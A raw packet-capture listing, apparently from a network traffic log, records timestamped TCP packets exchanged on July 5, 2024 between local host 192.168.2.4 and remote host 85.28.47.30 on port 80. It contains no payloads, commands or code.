                                                                Jul 5, 2024 04:36:00.346816063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346831083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346846104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346860886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346868038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346875906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346877098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346899986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346924067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.346946955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.346993923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347147942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347162962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347179890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347193956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347202063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347209930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347224951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347229004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347254038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347287893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347302914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347318888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347321987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347330093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347345114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347364902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347469091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347485065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347516060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347528934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347614050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347630978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347665071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347673893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347774982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347790956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347806931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.347825050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347843885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.347852945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420691967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420708895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420725107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420748949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420753002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420764923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420768976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420785904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420799017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420803070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420820951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420825005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420845985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420851946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420861959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420872927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420878887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420881033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420898914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420903921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420914888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420917988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420933008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.420938015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420959949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.420969963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421020031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421036005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421051025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421061993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421067953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421082020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421086073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421097040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421104908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421111107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421119928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421123028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421144962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421159029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421169996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421183109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421199083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421204090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421215057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421215057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421231985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421241999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421250105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421257019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421266079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.421274900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421291113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.421300888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427301884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427316904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427334070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427357912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427386999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427402973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427428007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427433014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427437067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427448034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427469015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427479982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427484989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427500963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427511930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427516937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427532911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427545071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427560091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427577972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427592993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427608967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427618027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427624941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427639008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427644014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427654982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427669048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427681923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427697897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427738905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427752972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427778959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427787066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427794933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427803993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427826881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427860022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427892923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427910089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427927017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427936077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427942991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427958965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427963972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.427978039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.427984953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.428004026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.428010941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.428025961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.428112030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.428150892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.436853886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.436901093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.436916113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.436939955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.436954975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.436964035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.436995983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437031031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437047958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437077045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437089920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437093973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437108040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437124968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437134027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437141895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437151909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437164068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437184095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437231064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437275887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437309980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437326908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437342882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437354088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437380075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437380075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437485933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437501907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437530994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437541962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437573910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437608004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437617064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437624931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437649965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437664032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437664986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437690973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437705040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437727928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437784910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437800884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437815905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437825918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437838078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437843084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437859058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437886000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437931061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437947035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437962055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.437979937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.437988997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438008070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438044071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438060999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438075066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438083887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438091993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438102961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438107967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438114882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438126087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438134909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438143015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438148975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438169956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438172102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438188076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438189030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438204050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438213110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438220978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438245058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438245058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438263893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438281059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438286066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438296080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438298941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438321114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438328981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438374043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438415051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438432932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438448906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438466072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438474894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438479900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.438487053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438505888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.438515902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.690145016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.690180063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:00.695131063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.695149899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.695163012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.695175886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:00.695188046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:01.359997034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:01.360090971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:01.655373096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:01.655410051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:01.660214901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:01.660229921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:01.660278082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:02.326611042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:02.326680899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:02.338068962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:02.344202995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:02.952513933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:02.952605963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:03.189454079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:03.194319010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:03.732852936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:03.733020067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.308769941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.313723087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488436937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488451004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488461971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488472939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488490105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488502979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488511086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488511086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488539934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488547087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488550901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488579035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488595009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488600969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488605022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488617897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488632917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488641977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488647938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488667011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488686085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488718987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488729000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488739014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.488763094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.488778114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570501089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570573092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570822954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570832968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570849895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570859909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570868969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570882082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570887089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570897102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570913076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570923090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570924997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570931911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570935965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570943117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570952892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570956945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.570965052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570975065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570986032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.570991039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571016073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571021080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571026087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571031094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571041107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571069956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571069956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571079969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571089983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571100950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571147919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571182013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571192980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571202993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571230888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571244955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571273088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571285009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571294069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571320057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571326017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571332932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.571343899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.571368933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782169104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782185078 CEST804973085.28.47.30192.168.2.4
